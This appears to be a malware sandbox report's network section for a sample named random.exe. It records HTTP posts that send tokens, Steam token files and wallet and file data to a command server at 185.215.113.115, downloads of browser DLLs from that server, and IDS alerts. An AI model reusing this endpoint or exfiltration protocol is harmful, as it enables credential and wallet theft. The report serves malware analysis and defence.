              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJJKEGHJKFHJKFHDHCFHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 4b 45 47 48 4a 4b 46 48 4a 4b 46 48 44 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 64 63 63 33 36 65 31 62 63 36 36 34 64 63 61 34 32 30 65 62 33 34 64 66 39 33 34 65 64 36 35 33 35 30 30 62 33 36 31 33 32 63 38 32 31 66 36 34 62 65 34 34 64 37 31 33 32 32 36 61 63 30 35 64 61 65 35 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 4b 45 47 48 4a 4b 46 48 4a 4b 46 48 44 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 4b 45 47 48 4a 4b 46 48 4a 4b 46 48 44 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 4b 45 47 48 4a 4b 46 48 4a 4b 46 48 44 48 43 46 2d 2d 0d 0a Data Ascii: ------IJJJKEGHJKFHJKFHDHCFContent-Disposition: form-data; name="token"13dcc36e1bc664dca420eb34df934ed653500b36132c821f64be44d713226ac05dae5d47------IJJJKEGHJKFHJKFHDHCFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IJJJKEGHJKFHJKFHDHCFContent-Disposition: form-data; name="file"------IJJJKEGHJKFHJKFHDHCF--
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIJJJKKJJDAKEBFIJDHHost: 185.215.113.115Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 64 63 63 33 36 65 31 62 63 36 36 34 64 63 61 34 32 30 65 62 33 34 64 66 39 33 34 65 64 36 35 33 35 30 30 62 33 36 31 33 32 63 38 32 31 66 36 34 62 65 34 34 64 37 31 33 32 32 36 61 63 30 35 64 61 65 35 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"13dcc36e1bc664dca420eb34df934ed653500b36132c821f64be44d713226ac05dae5d47------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="message"wallets------BGDAAEHDHIIJKECBKEBA--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEBFHJKJEBFCBFHDAEGHost: 185.215.113.115Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 64 63 63 33 36 65 31 62 63 36 36 34 64 63 61 34 32 30 65 62 33 34 64 66 39 33 34 65 64 36 35 33 35 30 30 62 33 36 31 33 32 63 38 32 31 66 36 34 62 65 34 34 64 37 31 33 32 32 36 61 63 30 35 64 61 65 35 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 2d 2d 0d 0a Data Ascii: ------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="token"13dcc36e1bc664dca420eb34df934ed653500b36132c821f64be44d713226ac05dae5d47------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="message"files------DAEBFHJKJEBFCBFHDAEG--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAAKJDAAFBAAKEBAAKFHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 41 4b 4a 44 41 41 46 42 41 41 4b 45 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 64 63 63 33 36 65 31 62 63 36 36 34 64 63 61 34 32 30 65 62 33 34 64 66 39 33 34 65 64 36 35 33 35 30 30 62 33 36 31 33 32 63 38 32 31 66 36 34 62 65 34 34 64 37 31 33 32 32 36 61 63 30 35 64 61 65 35 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 41 4b 4a 44 41 41 46 42 41 41 4b 45 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 41 4b 4a 44 41 41 46 42 41 41 4b 45 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 41 4b 4a 44 41 41 46 42 41 41 4b 45 42 41 41 4b 46 2d 2d 0d 0a Data Ascii: ------BAAAKJDAAFBAAKEBAAKFContent-Disposition: form-data; name="token"13dcc36e1bc664dca420eb34df934ed653500b36132c821f64be44d713226ac05dae5d47------BAAAKJDAAFBAAKEBAAKFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BAAAKJDAAFBAAKEBAAKFContent-Disposition: form-data; name="file"------BAAAKJDAAFBAAKEBAAKF--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEGCAEGIIJKFIEHIJEHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 47 43 41 45 47 49 49 4a 4b 46 49 45 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 64 63 63 33 36 65 31 62 63 36 36 34 64 63 61 34 32 30 65 62 33 34 64 66 39 33 34 65 64 36 35 33 35 30 30 62 33 36 31 33 32 63 38 32 31 66 36 34 62 65 34 34 64 37 31 33 32 32 36 61 63 30 35 64 61 65 35 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 47 43 41 45 47 49 49 4a 4b 46 49 45 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 47 43 41 45 47 49 49 4a 4b 46 49 45 48 49 4a 45 2d 2d 0d 0a Data Ascii: ------DBKEGCAEGIIJKFIEHIJEContent-Disposition: form-data; name="token"13dcc36e1bc664dca420eb34df934ed653500b36132c821f64be44d713226ac05dae5d47------DBKEGCAEGIIJKFIEHIJEContent-Disposition: form-data; name="message"ybncbhylepme------DBKEGCAEGIIJKFIEHIJE--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFBHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 64 63 63 33 36 65 31 62 63 36 36 34 64 63 61 34 32 30 65 62 33 34 64 66 39 33 34 65 64 36 35 33 35 30 30 62 33 36 31 33 32 63 38 32 31 66 36 34 62 65 34 34 64 37 31 33 32 32 36 61 63 30 35 64 61 65 35 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="token"13dcc36e1bc664dca420eb34df934ed653500b36132c821f64be44d713226ac05dae5d47------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CBGCAFIIECBFIDHIJKFB--
              Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
              Source: Joe Sandbox ViewIP Address: 185.215.113.115 185.215.113.115
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49704 -> 185.215.113.115:80
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49737 -> 185.215.113.115:80
              Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49733 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
              Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
              Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCLnKzQEIitPNARjBy8wBGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: apis.google.com
              Source: global trafficDNS traffic detected: DNS query: play.google.com
              Source: unknownHTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 915sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCLnKzQEIitPNARjBy8wBGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: random.exe, 00000000.00000002.1871424059.00000000000D4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.115
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dll
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dllP
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/mozglue.dll
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dll
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dllb
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/nss3.dll
              Source: random.exe, 00000000.00000002.1873121673.000000000133A000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/softokn3.dll
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/softokn3.dll6
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/sqlite3.dll
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1871424059.00000000000D4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.php
              Source: random.exe, 00000000.00000002.1873121673.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.php3b
              Source: random.exe, 00000000.00000003.1614857069.000000000134D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.php6
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.php9
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpA
              Source: random.exe, 00000000.00000002.1873121673.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpBrowser
              Source: random.exe, 00000000.00000002.1873121673.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpEp
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpI
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpQ
              Source: random.exe, 00000000.00000002.1873121673.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpS
              Source: random.exe, 00000000.00000002.1871424059.00000000000D4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpSxS
              Source: random.exe, 00000000.00000002.1871424059.00000000000D4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpation
              Source: random.exe, 00000000.00000002.1871424059.00000000001B7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpion:
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpnfigOverlay
              Source: random.exe, 00000000.00000002.1873121673.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpu
              Source: random.exe, 00000000.00000002.1871424059.00000000001B7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.115IJE
              Source: random.exe, 00000000.00000002.1873121673.00000000012BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.115p
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
